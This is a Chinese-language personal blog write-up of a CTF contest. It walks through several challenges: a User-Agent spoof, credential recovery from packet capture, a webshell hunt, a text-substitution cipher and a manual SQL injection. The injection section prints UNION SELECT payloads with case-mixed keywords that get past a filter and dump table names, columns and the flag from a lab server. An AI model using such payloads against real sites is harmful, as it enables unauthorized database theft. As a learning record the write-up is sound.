安恒10月夺旗赛

                                    **概述**

昨天参加的比赛,这个比赛是信安之路微信公众号和安恒合作的一个比赛,是个人赛。作为一个大一的嫩鸡,还是搞web的,对于re和pwn毫无办法,所以昨天最终的结果是这样的
安恒10月夺旗赛_第1张图片
安恒10月夺旗赛_第2张图片

                                 **过程**

这一次部分题需要用VPN内网访问,但是不知道为什么刚开始的时候我的VPN用不了导致我做题比别人迟了,一道题前三个解开的可以获额外分的……
按我做题的顺序来,第一题做的是web的第一题,打开页面后要求用手机访问,估计是改HTTP头了,描述里有提到iPhone6神马的,我就在网上找了找iPhone手机的HTTP头里的User-Agent,burpsuite拦截改包,如下
安恒10月夺旗赛_第3张图片
接下来看了看web第二题,关于XSS的,找了个XSS平台然后复制粘贴了一段代码试了试,发现被过滤了,菜鸡不会绕,放弃这道题。
然后看了下misc,第一题是流量分析的一道题,很简单一道题,居然500分。下载下来后wireshark打开,数据量并不大,根据提示找了找,发现了一个login的post数据包,直接得到了用户名和密码
安恒10月夺旗赛_第4张图片
然后根据提示去把这两个值加密得到flag
安恒10月夺旗赛_第5张图片
misc第二题是去一堆网页文件中找到webshell,shell的密码就是flag。我无耻的用了360扫描
安恒10月夺旗赛_第6张图片
发现了shell,然后进去找密码得到flag
安恒10月夺旗赛_第7张图片
然后是密码学的一道题。
安恒10月夺旗赛_第8张图片
下载开来是个Word文档,里面有两段文字和一段很淡、肉眼容易忽略的文字,两段文字内容一样,但是有些字被替换了,两段文字对比得到加密方式,然后去解密后面那段文字,提交暗语。
安恒10月夺旗赛_第9张图片
最后去做了web的第三题,注入的一道题,菜鸡的我还不是很会手注,中途还请教了大二的学长……
点开新闻页面后,先试了试and 1=1
安恒10月夺旗赛_第10张图片
过滤了 试试aNd 2=2,成功绕过
一共有5条新闻,然后试了试这样

http://192.168.5.13/viewld.do?ldid=2 aNd 2=3 unIon sElect 1,database(),version(),4,5

安恒10月夺旗赛_第11张图片
然后爆表名

http://192.168.5.13/viewld.do?ldid=2 unIon sElect 1,group_concat(table_name),3,4,5 From InFoRmation_schema.tables where table_schema=database()

安恒10月夺旗赛_第12张图片
发现了flag所在,爆字段

http://192.168.5.13/viewld.do?ldid=2 unIon sElect 1,group_concat(column_name),3,4,5 From InFoRmation_schema.columns where table_schema=database() aNd table_name='tb_flag'

安恒10月夺旗赛_第13张图片
最终的payload

http://192.168.5.13/viewld.do?ldid=2 unIon sElect 1,flag,3,4,5 From news.tb_flag

安恒10月夺旗赛_第14张图片

然后这次比赛对我来说就结束了

你可能感兴趣的:(比赛经历)